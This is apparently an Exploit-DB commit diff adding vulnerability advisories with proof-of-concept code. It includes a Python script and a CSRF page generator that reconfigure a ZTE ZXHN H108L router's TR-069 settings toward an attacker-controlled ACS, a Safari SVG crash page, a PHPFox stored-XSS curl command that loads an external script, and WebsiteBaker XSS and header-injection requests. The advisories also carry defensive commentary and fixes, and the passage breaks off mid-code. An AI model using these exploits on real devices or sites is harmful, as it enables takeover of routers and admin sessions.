Updated 11_19_2014
parent 892f0c3055, commit a28bed7356
8 changed files with 682 additions and 0 deletions
@@ -31767,3 +31767,10 @@ id,file,description,date,author,platform,type,port
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
platforms/hardware/webapps/35276.txt (71 lines, executable file)

@@ -0,0 +1,71 @@
About the software
==================

The ZTE ZXHN H108L is a router that some large Greek ISPs supply to their subscribers.

Vulnerability Details
=====================

The CWMP configuration page is reachable only through the Administrator account. CWMP (TR-069) is the protocol ISPs worldwide use to provision and troubleshoot subscriber equipment remotely; the ACS a device trusts can push configuration and firmware to it. However, editing the CWMP configuration, that is, sending the POST request behind the form, requires no authentication at all.

Affected Products
=================
Device model : ZTE ZXHN H108L
Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4

Proof of Concept
================
#!/usr/bin/python
# Unauthenticated CWMP (TR-069) reconfiguration of the ZTE ZXHN H108L:
# points the router at an ACS of your choosing. Run from the LAN side.
import sys
import requests

router = "http://192.168.1.254"         # default LAN address of the CPE
acs_server = "http://<server>:<port>"   # ACS the router should connect to
acs_user = "user"
acs_pass = "pass"

# Connection request parameters. When a request is made to the following URL,
# using the specified user/pass combination, the router will connect back to the ACS server.
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"

# Periodic inform parameters
active = 1
interval = 2000

payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server, 'CWMP_ACSUserName': acs_user, 'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0'}

# No session cookie and no credentials are sent: the form handler does not check for a logged-in session.
r = requests.post(router + "/Forms/access_cwmp_1", data=payload, timeout=10)
print("HTTP %d, %d bytes" % (r.status_code, len(r.content)))
sys.exit(0 if r.ok else 1)
Impact
======

The vulnerability lets any unauthenticated user rewrite the CWMP configuration, i.e. point the router at an ACS the attacker controls. It can be exploited by LAN users, or from the Internet if the router is configured to expose the web interface on the WAN side. Because the router also lacks CSRF protection, a malicious web page can submit the same POST from the browser of a victim inside the LAN.
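The cross-site variant described above, as an added example that is not Project Zero Labs' code: it generates the auto-submitting page using the same form fields as the PoC, and shows the Origin/Referer check the form handler is missing. The attacker ACS address is a hypothetical value.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed values: the form fields are the ones the PoC posts, the ACS address is
# a hypothetical attacker-controlled endpoint.
ROUTER_FORM = "http://192.168.1.254/Forms/access_cwmp_1"
ATTACKER_ACS = "http://acs.attacker.example:7547"

CWMP_FIELDS = {
    "CWMP_active": "1",
    "CWMP_ACSURL": ATTACKER_ACS,
    "CWMP_ACSUserName": "user",
    "CWMP_ACSPassword": "pass",
    "CWMP_ConnectionRequestPath": "/tr069",
    "CWMP_ConnectionRequestPort": "7564",
    "CWMP_ConnectionRequestUserName": "user",
    "CWMP_ConnectionRequestPassword": "pass",
    "CWMP_PeriodActive": "1",
    "CWMP_PeriodInterval": "2000",
    "CWMPLockFlag": "0",
}


def build_csrf_page(action, fields):
    """Return an HTML page that POSTs `fields` to `action` as soon as it loads.

    A plain form submission is a 'simple' cross-origin request: the browser sends it
    without a CORS preflight, and because the router checks neither a session nor a
    CSRF token, the request is accepted as if the LAN user had submitted the form.
    """
    inputs = "\n".join(
        '    <input type="hidden" name="{}" value="{}">'.format(
            html.escape(name, quote=True), html.escape(value, quote=True))
        for name, value in fields.items())
    return (
        "<!DOCTYPE html>\n<html><body>\n"
        '  <form id="f" method="POST" action="{}">\n{}\n  </form>\n'
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    ).format(html.escape(action, quote=True), inputs)


def form_field_names(page):
    """Names of the hidden inputs in a page produced by build_csrf_page (self-check helper)."""
    return re.findall(r'name="([^"]+)"', page)


def is_same_origin_post(headers, router_host="192.168.1.254"):
    """The server-side check the firmware is missing: a state-changing POST must carry an
    Origin (or, failing that, Referer) header naming the router itself. The page above
    arrives with the attacker's origin and has to be rejected; no provenance at all fails closed."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).hostname == router_host


if __name__ == "__main__":
    print(build_csrf_page(ROUTER_FORM, CWMP_FIELDS))
```

Serving the generated page from any site a LAN user visits is enough; the origin check (or a per-session token in the form) is what would stop it, independently of the missing authentication.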
Severity
========

Medium

References
==========

https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/

Disclosure Timeline
===================

27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response states that the ISP should be contacted
03/11/2014 - Second attempt to contact the ISP
14/11/2014 - No response from the ISP. Public disclosure

Contact Information
===================
Domain: https://projectzero.gr
Social: twitter.com/projectzerolabs
Contact: labs _at_ projectzero.gr
platforms/osx/dos/35279.html (127 lines, executable file)

@@ -0,0 +1,127 @@

@w3bd3vil
<!DOCTYPE html>
<html>
<head>
<style>
svg {
  padding-top: 1337%;
  box-sizing: border-box;
}
</style>
</head>
<body>
<svg viewBox="0 0 500 500" width="500" height="500">
  <polyline points="1 1,2 2"></polyline>
</svg>
</body>
</html>
<!--
Safari 8.0 / OSX 10.10

* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
    frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8ab10282: jae 0x7fff8ab1028c ; __pthread_kill + 20
   0x7fff8ab10284: movq %rax, %rdi
   0x7fff8ab10287: jmp 0x7fff8ab0bca3 ; cerror_nocancel
   0x7fff8ab1028c: retq
(lldb) register read
General Purpose Registers:
    rax = 0x0000000000000000
    rbx = 0x0000000000000006
    rcx = 0x00007fff5b761d98
    rdx = 0x0000000000000000
    rdi = 0x000000000000140f
    rsi = 0x0000000000000006
    rbp = 0x00007fff5b761dc0
    rsp = 0x00007fff5b761d98
     r8 = 0x0000000000000000
     r9 = 0x00000000000000a8
    r10 = 0x0000000008000000
    r11 = 0x0000000000000206
    r12 = 0x00007fff84b36487 "transform_is_valid(m)"
    r13 = 0x0000000108c2c000
    r14 = 0x00007fff747ae300 libsystem_pthread.dylib`_thread
    r15 = 0x00007fff84b36477 "Paths/CGPath.cc"
    rip = 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
 rflags = 0x0000000000000206
     cs = 0x0000000000000007
     fs = 0x0000000000000000
     gs = 0x0000000000000000

(lldb) bt
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
    frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
    frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
    frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
    frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
    frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
    frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
    frame #8: 0x00007fff8f47a2fa WebCore`WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
    frame #9: 0x00007fff8f47a633 WebCore`WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
    frame #10: 0x00007fff8eab4aeb WebCore`WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
    frame #11: 0x00007fff8eab477d WebCore`WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1325
    frame #12: 0x00007fff8ea2c3f2 WebCore`WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
    frame #13: 0x00007fff8ef300a8 WebCore`WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
    frame #14: 0x00007fff8e9b1e83 WebCore`WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
    frame #15: 0x00007fff8e9b1929 WebCore`WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
    frame #16: 0x00007fff8e9613c6 WebCore`WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
    frame #17: 0x00007fff8e95e9a3 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
    frame #18: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #19: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #20: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    frame #21: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    frame #22: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    frame #23: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #24: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #25: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    frame #26: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    frame #27: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    frame #28: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #29: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #30: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    frame #31: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    frame #32: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    frame #33: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    frame #34: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    frame #35: 0x00007fff8e95e8e2 WebCore`WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
    frame #36: 0x00007fff8e95e5b7 WebCore`WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
    frame #37: 0x00007fff8e95d252 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2386
    frame #38: 0x00007fff8e95c6e2 WebCore`WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
    frame #39: 0x00007fff8e95d392 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2706
    frame #40: 0x00007fff8e988376 WebCore`WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
    frame #41: 0x00007fff8f432baf WebCore`WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
    frame #42: 0x00007fff8ee86924 WebCore`WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
    frame #43: 0x00007fff8f3b2f59 WebCore`WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
    frame #44: 0x00007fff8f60f367 WebCore`WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
    frame #45: 0x00007fff8f6983fc WebCore`-[WebSimpleLayer drawInContext:] + 172
    frame #46: 0x00007fff85249355 QuartzCore`CABackingStoreUpdate_ + 3820
    frame #47: 0x00007fff85248463 QuartzCore`___ZN2CA5Layer8display_Ev_block_invoke + 59
    frame #48: 0x00007fff8524841f QuartzCore`x_blame_allocations + 81
    frame #49: 0x00007fff85247f1c QuartzCore`CA::Layer::display_() + 1546
    frame #50: 0x00007fff8f69831b WebCore`-[WebSimpleLayer display] + 43
    frame #51: 0x00007fff85247641 QuartzCore`CA::Layer::display_if_needed(CA::Transaction*) + 603
    frame #52: 0x00007fff85246d7d QuartzCore`CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
    frame #53: 0x00007fff8524650e QuartzCore`CA::Context::commit_transaction(CA::Transaction*) + 242
    frame #54: 0x00007fff85246164 QuartzCore`CA::Transaction::commit() + 390
    frame #55: 0x00007fff85256f55 QuartzCore`CA::Transaction::observer_call(__CFRunLoopObserver*, unsigned long, void*) + 71
    frame #56: 0x00007fff867e5d87 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
    frame #57: 0x00007fff867e5ce0 CoreFoundation`__CFRunLoopDoObservers + 368
    frame #58: 0x00007fff867d7858 CoreFoundation`CFRunLoopRunSpecific + 328
    frame #59: 0x00007fff8434943f HIToolbox`RunCurrentEventLoopInMode + 235
    frame #60: 0x00007fff843491ba HIToolbox`ReceiveNextEventCommon + 431
    frame #61: 0x00007fff84348ffb HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
    frame #62: 0x00007fff90583821 AppKit`_DPSNextEvent + 964
    frame #63: 0x00007fff90582fd0 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 194
    frame #64: 0x00007fff90576f73 AppKit`-[NSApplication run] + 594
    frame #65: 0x00007fff90562424 AppKit`NSApplicationMain + 1832
    frame #66: 0x00007fff8d881ef2 libxpc.dylib`_xpc_objc_main + 793
    frame #67: 0x00007fff8d883a9d libxpc.dylib`xpc_main + 490
    frame #68: 0x000000010449ab40 com.apple.WebKit.WebContent`___lldb_unnamed_function1$$com.apple.WebKit.WebContent + 16
    frame #69: 0x00007fff850755c9 libdyld.dylib`start + 1
    frame #70: 0x00007fff850755c9 libdyld.dylib`start + 1
(lldb)
-->
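Triage of an lldb session like the one above is the first step with any crash PoC: is the top non-runtime frame in application code, and is the stop a controlled abort() from a failed assertion (the `__assert_rtn` frame, with the assertion text in r12 and the source file in r15) or an uncontrolled fault? The following is an added example, not w3bd3vil's code, that parses the thread line, the string-valued registers and the backtrace and answers those questions; its input is a constructed excerpt of the session above.

```python
import re

# Constructed excerpt of the lldb session (thread line, the two string-valued registers,
# top of the backtrace). A real triage script would read the whole log file.
SAMPLE_LLDB = """
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
(lldb) register read
    r12 = 0x00007fff84b36487 "transform_is_valid(m)"
    r15 = 0x00007fff84b36477 "Paths/CGPath.cc"
(lldb) bt
  * frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
    frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
    frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
    frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
    frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
    frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
    frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
"""

FRAME_RE = re.compile(r'^\s*\*?\s*frame #(\d+): (0x[0-9a-fA-F]+) ([^`]+)`(.*?)(?: \+ (\d+))?\s*$')
REG_STR_RE = re.compile(r'^\s*(\w+) = (0x[0-9a-fA-F]+)\s+"([^"]*)"', re.M)
SIGNAL_RE = re.compile(r'stop reason = signal (\w+)')
RUNTIME_PREFIXES = ("libsystem_", "libdyld", "libxpc")   # kernel shims and C runtime, never the culprit


def parse_frames(text):
    """One dict per `frame #N:` line: index, address, module, demangled symbol, offset."""
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line)
        if m:
            idx, addr, module, symbol, off = m.groups()
            frames.append({"idx": int(idx), "addr": int(addr, 16), "module": module,
                           "symbol": symbol, "offset": int(off or 0)})
    return frames


def triage(text):
    frames = parse_frames(text)
    symbols = [f["symbol"] for f in frames]
    sig = SIGNAL_RE.search(text)
    # lldb prints C strings a register points at in quotes: here the assertion and its file
    strings = [s for _name, _addr, s in REG_STR_RE.findall(text)]
    # first frame outside the runtime: the code that actually decided to die
    culprit = next((f for f in frames if not f["module"].startswith(RUNTIME_PREFIXES)), None)
    first_webcore = next((f for f in frames if f["module"] == "WebCore"), None)
    assertion_abort = "__assert_rtn" in symbols and "abort" in symbols
    return {
        "signal": sig.group(1) if sig else None,
        "assertion_abort": assertion_abort,
        "culprit": culprit,
        "first_webcore_frame": first_webcore,
        "register_strings": strings,
        "verdict": ("abort() from a failed assertion: treat as DoS unless the assertion guards a memory-unsafe path"
                    if assertion_abort else "uncontrolled fault: investigate for memory corruption"),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LLDB).items():
        print(key, "=", value)
```

On this log the culprit is frame #4, `CGPathCreateMutableCopyByTransformingPath` in CoreGraphics, reached from `WebCore::GraphicsContext::fillPath`, and the register strings give the failed check `transform_is_valid(m)` in `Paths/CGPath.cc`, which is why the entry is filed as a DoS rather than code execution.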
platforms/php/webapps/35274.txt (80 lines, executable file)

@@ -0,0 +1,80 @@
# Exploit Title: PHPFox XSS AdminCP
# Date: 2014-10-22
# Exploit Author: Wesley Henrique Leite aka "spyk2r"
# Vendor Homepage: http://www.moxi9.com
# Version: All versions
# CVE : CVE-2014-8469

# Vendor Response: fixed 2014-10-23 (in v4 Beta)

[+] DESCRIPTION

The system records every request in the database table 'phpfox_log_session'; the relevant part of its schema is:

[phpfox]> desc phpfox_log_session;
+---------------+----------------------+------+-----+---------+-------+
| Field         | Type                 | Null | Key | Default | Extra |
+---------------+----------------------+------+-----+---------+-------+
| ...           | (more columns)       |      |     |         |       |
| user_agent    | varchar(100)         | NO   |     | NULL    |       |
+---------------+----------------------+------+-----+---------+-------+

The column an attacker controls is:
-> user_agent (100 characters)

Every visit the system records, including bots and users browsing the site, is listed in the AdminCP under:

AdminCP
TOOLS > Online > Guests/Boots

Output
| IP ADDRESS | User-Agent | ...

Knowing this, the following requests inject a script into the AdminCP through the User-Agent header:

$ curl -A "<script src='http://www.example.com/script.js'></script>" \
    http://www.meusite.com.br/

OR

$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/

When any user with administrative access opens

'AdminCP'
TOOLS > Online > Guests/Boots

the script runs in the administrative area: a stored XSS whose sink is an admin-only view.
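An added example, not PHPFox code or the author's, that models the path from the User-Agent header to the AdminCP table cell: the varchar(100) width from the schema above, the raw template interpolation, and HTML escaping as the alternative fix. The sample User-Agent strings are constructed, and MySQL's silent truncation is an assumption about the deployment's sql_mode.

```python
import html

USER_AGENT_WIDTH = 100  # varchar(100), from the phpfox_log_session schema excerpt

# Constructed inputs: one ordinary browser User-Agent and the two payloads from the curl commands.
SAMPLE_USER_AGENTS = {
    "chrome": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36",
    "remote_script": "<script src='http://www.example.com/script.js'></script>",
    "inline": "<script>alert(1);</script>",
}


def store_user_agent(ua, width=USER_AGENT_WIDTH):
    """Model the varchar(100) column. Assumption: MySQL is not in STRICT mode, so an over-long
    value is silently truncated rather than rejected. Either way a payload has to fit in
    100 characters, which is why the first curl command loads the real code from an external script."""
    return ua[:width]


def payload_fits(ua, width=USER_AGENT_WIDTH):
    return len(ua) <= width


def render_cell_vulnerable(stored_ua):
    """The original template line: <td>{$aGuest.user_agent}</td> (raw interpolation)."""
    return "<td>{}</td>".format(stored_ua)


def render_cell_escaped(stored_ua):
    """Output encoding for an HTML text context: the stored value is untouched, the markup is neutralised."""
    return "<td>{}</td>".format(html.escape(stored_ua, quote=True))


def script_executes(rendered_cell):
    """Crude oracle for the self-check: an unescaped <script start tag survived into the page."""
    return "<script" in rendered_cell.lower()


def exploit_chain(ua):
    """Follow one User-Agent from the HTTP request to the AdminCP page under both templates."""
    stored = store_user_agent(ua)
    return {
        "fits": payload_fits(ua),
        "vulnerable": script_executes(render_cell_vulnerable(stored)),
        "escaped": script_executes(render_cell_escaped(stored)),
    }


if __name__ == "__main__":
    for label, ua in SAMPLE_USER_AGENTS.items():
        print(label, exploit_chain(ua))
```

Escaping at the point of output is the fix that generalises: the same user_agent value reused in an attribute or a JavaScript string needs a different encoding, and stripping tags at one sink does nothing for the others.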
[+] My Solution

(line 1.8)

1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php
Tue Oct 21 10:00:11 2014 -0200
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php
Tue Oct 21 12:28:39 2014 -0200
1.3 @@ -25,7 +25,7 @@
1.4 {foreach from=$aGuests key=iKey item=aGuest}
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">
1.6 <td><a href="{url link='admincp.core.ip'
search=$aGuest.ip_address_search}" title="{phrase
var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>
1.7 - <td>{$aGuest.user_agent}</td>
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>
1.9 <td class="t_center">
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id}
style="display:none;"{/if}>
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0"
class="js_item_active_link" title="{phrase var='admincp.unban'}">{img
theme='misc/bullet_green.png' alt=''}</a>
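Review bot: the fix at line 1.8 replaces raw interpolation with `|strip_tags`, which is tag removal rather than output encoding; for a value rendered inside a `<td>` the appropriate filter is HTML escaping (htmlspecialchars semantics), which keeps the recorded User-Agent intact and also covers `&`-based and quote-based input that strip_tags lets through. Because the value is still stored unescaped, every other template that prints user_agent needs the same treatment, not only this cell.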
1.12 @@ -43,4 +43,4 @@
1.13 <div class="extra_info">
1.14 {phrase var='admincp.no_guests_online'}
1.15 </div>
1.16 -{/if}
1.17 \ No newline at end of file
1.18 +{/if}
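Review bot: the second hunk (1.12 to 1.18) only adds the missing trailing newline after `{/if}`; it has no security effect and should be marked as cosmetic so that reviewers do not look for a second functional change in it.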
platforms/php/webapps/35277.txt (111 lines, executable file)

@@ -0,0 +1,111 @@
=============================================
MGC ALERT 2014-004
- Original release date: March 11, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in WebsiteBaker 2.8.3

II. BACKGROUND
-------------------------
WebsiteBaker helps you to create the website you want: a free, easy and secure, flexible and extensible open source content management system (CMS).

III. DESCRIPTION
-------------------------
SQL code can be injected through the "page_id" parameter (the advisory calls it "id") of the page "admin/pages/modify.php". This bug was found without authenticating to the portal. To exploit it, it is only necessary to talk to the application using version 1.0 of the HTTP protocol.

A reflected XSS vulnerability has also been found in WebsiteBaker, which allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

An input validation problem in WebsiteBaker allows CR (carriage return, %0D or \r) and LF (line feed, %0A or \n) characters to be injected into the server's HTTP response headers, resulting in an HTTP Response Splitting vulnerability.
IV. PROOF OF CONCEPT
-------------------------
SQL Injection (injection point; the advisory gives no payload):

/wb/admin/pages/modify.php?page_id=1

Cross-Site Scripting GET:

/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1&section_id=f953a"><script>alert(1)</script>4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1&section_id=%008b2f4"><script>alert(1)</script>bdc8b3919b5

HTTP RESPONSE SPLITTING:

With a valid user name and password, the "url" field of the login form can be used to inject into the response headers, for example:

POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponse

A header line "InjectedHeader:MaliciousCode" is injected because %0d%0a terminates the header the application is writing and %20 starts the next line. Note that the %20 makes the injected line begin with a space: a strictly RFC-compliant parser folds such a line into the previous header's value, so drop the %20 if the injected header must stand on its own.
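The request above relies on the decoded "url" field being copied into a response header. The following is an added example, not WebsiteBaker code: it models such a handler, parses the resulting response the way an RFC 7230 client does, shows the one-character difference between the advisory's %0d%0a%20 (folded into the previous header) and a bare %0d%0a (a new header), and the validation the handler should perform instead. The handler shape and the /wb/ target are assumptions.

```python
from urllib.parse import unquote


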